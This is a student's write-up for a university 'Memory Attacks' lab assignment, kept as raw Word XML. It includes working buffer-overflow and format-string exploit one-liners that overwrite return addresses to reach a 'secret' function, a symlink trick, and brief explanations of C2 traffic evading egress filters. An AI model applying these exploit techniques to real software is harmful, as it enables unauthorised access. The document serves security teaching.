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B88C" w14:textId="615F0EF3" w:rsidR="00140708" w:rsidRDefault="00615C03" w:rsidP="00461B7D">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r w:rsidRPr="007C71F1">
        <w:t>Assignment 0x03 - Memory Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515398E2" w14:textId="77777777" w:rsidR="00461B7D" w:rsidRDefault="00615C03" w:rsidP="00461B7D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00615C03">
        <w:t>(1 point) Go to /home/q1/. Exploit the program to get the secret.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9000B2" w14:textId="5F1C075E" w:rsidR="005E4D00" w:rsidRPr="005E4D00" w:rsidRDefault="006554B9" w:rsidP="00461B7D">
      <w:r w:rsidRPr="00461B7D">
        <w:t xml:space="preserve">First use the command “cat run_me.c” to see the code of the executable file and find the line “char buffer[1024];” indicated that the size of buffer is only 1024, so simply </w:t>
      </w:r>
      <w:r w:rsidR="00055FC3" w:rsidRPr="00461B7D">
        <w:t xml:space="preserve">overflow it with 1025 bytes to </w:t>
      </w:r>
      <w:r w:rsidR="00BE4A45" w:rsidRPr="00461B7D">
        <w:t>overflow</w:t>
      </w:r>
      <w:r w:rsidR="00055FC3" w:rsidRPr="00461B7D">
        <w:t xml:space="preserve"> the argument “changeme” to non-zero.</w:t>
      </w:r>
      <w:r w:rsidRPr="00461B7D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005E4D00" w:rsidRPr="00461B7D">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D7227F" w:rsidRPr="00D7227F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5221E193" wp14:editId="4CF15FF9">
            <wp:extent cx="5731510" cy="2517775"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11616731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3149" name="Picture 1" descr="A screen shot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2517775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DCC885" w14:textId="3C0538B6" w:rsidR="00461B7D" w:rsidRDefault="00615C03" w:rsidP="00461B7D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00615C03">
        <w:t>(2 points) Go to/ home/q2/. Exploit the program to get the secret.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC4FD95" w14:textId="2898C57B" w:rsidR="00615C03" w:rsidRPr="00461B7D" w:rsidRDefault="00461B7D" w:rsidP="00461B7D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00461B7D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Similar</w:t>
      </w:r>
      <w:r w:rsidR="00BE4A45" w:rsidRPr="00461B7D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the q1, just replace the 1025th byte to the address “0xabcdabcd”</w:t>
      </w:r>
      <w:r w:rsidRPr="00461B7D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> to write a specific data as the code indicated.</w:t>
      </w:r>
      <w:r w:rsidR="00D7227F" w:rsidRPr="00461B7D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D23155" w:rsidRPr="00461B7D">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73C7771D" wp14:editId="0E665224">
            <wp:extent cx="5731510" cy="2253615"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="889310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0374" name="Picture 1" descr="A screen shot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2253615"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="39412C9F" w14:textId="77777777" w:rsidR="00615C03" w:rsidRDefault="00615C03" w:rsidP="00461B7D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00615C03">
        <w:t>3. (2 points) Go to/ home/q3/. Exploit the program to get the secret.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D862822" w14:textId="0EB510BC" w:rsidR="00D23155" w:rsidRDefault="00461B7D" w:rsidP="00461B7D">
      <w:r>
        <w:t xml:space="preserve">First look at the code, noticed that there are two </w:t>
      </w:r>
      <w:r w:rsidR="00EC7B61">
        <w:t>function called “secret” and “lose”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A9277A" w14:textId="6BFF23DC" w:rsidR="00EC7B61" w:rsidRDefault="00EC7B61" w:rsidP="00461B7D">
      <w:r w:rsidRPr="00EC7B61">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="360F8EE8" wp14:editId="77320149">
            <wp:extent cx="1724526" cy="914400"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="19828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4373" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1757714" cy="931997"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="420A11E7" w14:textId="78503636" w:rsidR="00EC7B61" w:rsidRDefault="00EC7B61" w:rsidP="00461B7D">
      <w:r>
        <w:t xml:space="preserve">Then use “gdb” to find the address of the function “secret”, make a breakpoint in the function to </w:t>
      </w:r>
      <w:r w:rsidR="00770DF0">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00770DF0" w:rsidRPr="00770DF0">
        <w:t>chieve</w:t>
      </w:r>
      <w:r w:rsidR="00770DF0">
        <w:t xml:space="preserve"> the goal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2716DF12" w14:textId="2F4E7C48" w:rsidR="00770DF0" w:rsidRDefault="00770DF0" w:rsidP="00461B7D">
      <w:r w:rsidRPr="00770DF0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7102A188" wp14:editId="438C61B5">
            <wp:extent cx="5731510" cy="1931035"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="197109113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1131" name="Picture 1" descr="A computer screen with text and images&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1931035"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D76BB43" w14:textId="5EC25EFA" w:rsidR="00770DF0" w:rsidRDefault="00770DF0" w:rsidP="00461B7D">
      <w:r>
        <w:t>Got the address of the function “secret” at “</w:t>
      </w:r>
      <w:r w:rsidRPr="00770DF0">
        <w:t>0x565561ed</w:t>
      </w:r>
      <w:r>
        <w:t>”, use the similar command as q2 to rewrite the return address by using “</w:t>
      </w:r>
      <w:r w:rsidRPr="00770DF0">
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00770DF0">
        <w:t>run_me</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00770DF0">
        <w:t xml:space="preserve"> $(python -c "import sys; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00770DF0">
        <w:t>sys.stdout.buffer.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00770DF0">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00770DF0">
        <w:t>b'A</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00770DF0">
        <w:t>'*1024 + b'\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00770DF0">
        <w:t>xed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00770DF0">
        <w:t>\x61\x55\x56')")</w:t>
      </w:r>
      <w:r>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F799E98" w14:textId="4B6A4837" w:rsidR="00770DF0" w:rsidRPr="00D23155" w:rsidRDefault="00770DF0" w:rsidP="00461B7D">
      <w:r w:rsidRPr="00770DF0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4761388D" wp14:editId="17B54C5A">
            <wp:extent cx="5731510" cy="2440940"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="313687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544" name="Picture 1" descr="A screen shot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2440940"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1459B465" w14:textId="77777777" w:rsidR="00615C03" w:rsidRDefault="00615C03" w:rsidP="00461B7D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00615C03">
        <w:t>4. (2 points) Go to /home/q4/. Exploit the program to get the secret.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B514CB" w14:textId="15BDFEF5" w:rsidR="00E46659" w:rsidRDefault="00F5120B" w:rsidP="00E46659">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Similar as q3, using “gdb” to find the address of the function “secret”.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F5120B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20A54DCA" wp14:editId="149E6E48">
            <wp:extent cx="5731510" cy="2303780"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="93990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1469" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2303780"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC85F15" w14:textId="743D71B3" w:rsidR="00F5120B" w:rsidRDefault="00BD1720" w:rsidP="00E46659">
      <w:r>
        <w:t>Knowing that “</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD1720">
        <w:t xml:space="preserve">use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD1720">
        <w:t>sprintf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD1720">
        <w:t xml:space="preserve"> instead of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD1720">
        <w:t>strcpy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” and there is a limit for the string “</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD1720">
        <w:t>if (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD1720">
        <w:t>strlen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD1720">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD1720">
        <w:t>argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD1720">
        <w:t>[1]) &gt; 100)</w:t>
      </w:r>
      <w:r>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C691F9" w14:textId="41261AB7" w:rsidR="00BD1720" w:rsidRDefault="00BD1720" w:rsidP="00E46659">
      <w:r>
        <w:t xml:space="preserve">From the hint I know that </w:t>
      </w:r>
      <w:r w:rsidR="005A39EE">
        <w:t xml:space="preserve">I can use something like </w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005A39EE" w:rsidRPr="005A39EE">
        <w:t>printf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005A39EE" w:rsidRPr="005A39EE">
        <w:t xml:space="preserve"> "%0999d" 123</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="005A39EE">
        <w:t xml:space="preserve">, so I run </w:t>
      </w:r>
      <w:r w:rsidR="005A39EE" w:rsidRPr="005A39EE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005A39EE" w:rsidRPr="005A39EE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>run_me</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005A39EE" w:rsidRPr="005A39EE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> $(python -c "import sys; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005A39EE" w:rsidRPr="005A39EE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sys.stdout.buffer.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005A39EE" w:rsidRPr="005A39EE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(b'%1024d' + b'\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005A39EE" w:rsidRPr="005A39EE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>xfd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005A39EE" w:rsidRPr="005A39EE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>\x61\x55\x56')")</w:t>
      </w:r>
      <w:r w:rsidR="005A39EE">
        <w:t>” and got the answer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2001A18F" w14:textId="3A4DFD81" w:rsidR="005A39EE" w:rsidRPr="00E46659" w:rsidRDefault="005A39EE" w:rsidP="00E46659">
      <w:r w:rsidRPr="005A39EE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D031A40" wp14:editId="6040AF32">
            <wp:extent cx="5731510" cy="2433320"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="391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9548" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2433320"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="506A37FE" w14:textId="77777777" w:rsidR="00615C03" w:rsidRDefault="00615C03" w:rsidP="00461B7D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00615C03">
        <w:t>5. (2 points) Go to /home/q5/. Exploit the program to get the secret.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E395C5" w14:textId="72F40ADC" w:rsidR="00247C55" w:rsidRDefault="002C0D8D" w:rsidP="00247C55">
      <w:r>
        <w:t>From the code noticed that the “secret” is spelt wrong to the “secet”, and the “secet” file is not exist, so u</w:t>
      </w:r>
      <w:r w:rsidR="00247C55">
        <w:t>se “</w:t>
      </w:r>
      <w:r w:rsidR="00247C55" w:rsidRPr="00247C55">
        <w:t>ln -s /home/q5/secret secet</w:t>
      </w:r>
      <w:r w:rsidR="00247C55">
        <w:t>” to create a symbol link to the correct file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D550EC8" w14:textId="3AEE1FC3" w:rsidR="002C0D8D" w:rsidRDefault="002C0D8D" w:rsidP="00247C55">
      <w:r w:rsidRPr="002C0D8D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C45475E" wp14:editId="45279446">
            <wp:extent cx="5731510" cy="1322070"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12627985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8561" name="Picture 1" descr="A screen shot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1322070"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2068BC" w14:textId="042AE795" w:rsidR="002C0D8D" w:rsidRPr="00247C55" w:rsidRDefault="002C0D8D" w:rsidP="00247C55">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Then run the code again.</w:t>
      </w:r>
      <w:r w:rsidRPr="002C0D8D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36DDD08E" wp14:editId="002EC030">
            <wp:extent cx="5731510" cy="3832860"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="1113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706" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3832860"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F2F90C" w14:textId="77777777" w:rsidR="00615C03" w:rsidRDefault="00615C03" w:rsidP="00461B7D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00615C03">
        <w:t>6. (2 points) Go to /home/q6/. Exploit the program to get the secret.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0BCC66" w14:textId="62AFA429" w:rsidR="002C0D8D" w:rsidRDefault="004615BF" w:rsidP="002C0D8D">
      <w:r>
        <w:t>As mentioned in the code “</w:t>
      </w:r>
      <w:r w:rsidRPr="004615BF">
        <w:t>// This is only a slight variation on Q2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”, I found that just the </w:t>
      </w:r>
      <w:r w:rsidRPr="004615BF">
        <w:t>reading value</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> read from input to the “</w:t>
      </w:r>
      <w:r w:rsidRPr="004615BF">
        <w:t>environmental variable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”, so just use the same python code and rewrite the </w:t>
      </w:r>
      <w:r w:rsidRPr="004615BF">
        <w:t>environmental variable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to reach the goal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEC2C59" w14:textId="1B410D26" w:rsidR="004615BF" w:rsidRPr="002C0D8D" w:rsidRDefault="004615BF" w:rsidP="002C0D8D">
      <w:r w:rsidRPr="004615BF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29A22EB1" wp14:editId="30763D4A">
            <wp:extent cx="5731510" cy="2424430"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="186603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6593" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2424430"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2548F8CF" w14:textId="77777777" w:rsidR="00615C03" w:rsidRPr="00615C03" w:rsidRDefault="00615C03" w:rsidP="00461B7D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00615C03">
        <w:t xml:space="preserve">7. (1 point). Firewalls have the capability to block both ingress (inbound) and egress (outbound) traffic. Many organisations (and also true for my home NBN router) block </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00615C03">
        <w:t>ingress, but</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00615C03">
        <w:t xml:space="preserve"> is pretty open when it comes to egress rules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7DE08E" w14:textId="77777777" w:rsidR="00615C03" w:rsidRDefault="00615C03" w:rsidP="00461B7D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00615C03">
        <w:t>a) Why should organisations care about setting egress (outbound) firewall rules?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B3D9A6" w14:textId="107E5CCB" w:rsidR="00FE4A7F" w:rsidRPr="00FE4A7F" w:rsidRDefault="002B2EC4" w:rsidP="00FE4A7F">
      <w:r w:rsidRPr="002B2EC4">
        <w:lastRenderedPageBreak/>
        <w:t>Organizations need to implement egress firewall rules primarily to prevent data exfiltration, restrict malware communication, prevent resource misuse, comply with regulatory requirements, and reduce their attack surface. Egress rules help in preventing unauthorized data from leaving the network, curtail the communication between malware and command and control servers, avoid the organization's resources from being used for external attacks, assist in adhering to data protection regulations, and minimize the pathways attackers can exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271CB31B" w14:textId="77777777" w:rsidR="00615C03" w:rsidRDefault="00615C03" w:rsidP="00461B7D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00615C03">
        <w:t>b) Look up "C2 server" on the internet and explain why they can be successful even on firewalls that tightly restrict egress traffic to sanctioned ports like 53, 80 and 443.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063D4AEB" w14:textId="7AD87AA7" w:rsidR="002B2EC4" w:rsidRPr="002B2EC4" w:rsidRDefault="00F80E74" w:rsidP="002B2EC4">
      <w:r w:rsidRPr="00F80E74">
        <w:t xml:space="preserve">C2 (Command and Control) servers can successfully operate in environments with strict egress traffic controls because they exploit the allowed communication on common ports. Encrypted communications over ports 80 and 443 can disguise malicious traffic as normal web traffic, making it hard to detect. Additionally, DNS </w:t>
      </w:r>
      <w:r w:rsidR="00B4442E" w:rsidRPr="00F80E74">
        <w:t>tunnelling</w:t>
      </w:r>
      <w:r w:rsidRPr="00F80E74">
        <w:t xml:space="preserve"> techniques can be used to hide commands and data within DNS queries and responses through port 53, bypassing simple port-based egress filters. These methods enable malware to communicate with C2 servers, receiving commands and exfiltrating data, even in tightly controlled network environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130FCE88" w14:textId="77777777" w:rsidR="00615C03" w:rsidRDefault="00615C03" w:rsidP="00461B7D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00615C03">
        <w:t>8. </w:t>
      </w:r>
      <w:r w:rsidRPr="00615C03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(Bonus 2 points)</w:t>
      </w:r>
      <w:r w:rsidRPr="00615C03">
        <w:t> Go to /home/q7/. Exploit the program to get the secret.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EAB42D" w14:textId="38D04372" w:rsidR="00E2653C" w:rsidRPr="00E2653C" w:rsidRDefault="00E2653C" w:rsidP="00E2653C">
      <w:r>
        <w:t>Similar as the workshop “</w:t>
      </w:r>
      <w:r w:rsidRPr="00E2653C">
        <w:t>Running shellcode</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">” part that use GDB to </w:t>
      </w:r>
      <w:r w:rsidRPr="00E2653C">
        <w:t xml:space="preserve">get the location of the saved </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E2653C">
        <w:t>eip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E2653C">
        <w:t xml:space="preserve"> address</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7130BF7A" w14:textId="0B2EF0D5" w:rsidR="00497BB3" w:rsidRDefault="00497BB3" w:rsidP="008005CB">
      <w:r w:rsidRPr="00497BB3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22D9D646" wp14:editId="17739606">
            <wp:extent cx="5731510" cy="3065145"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="132311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7503" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
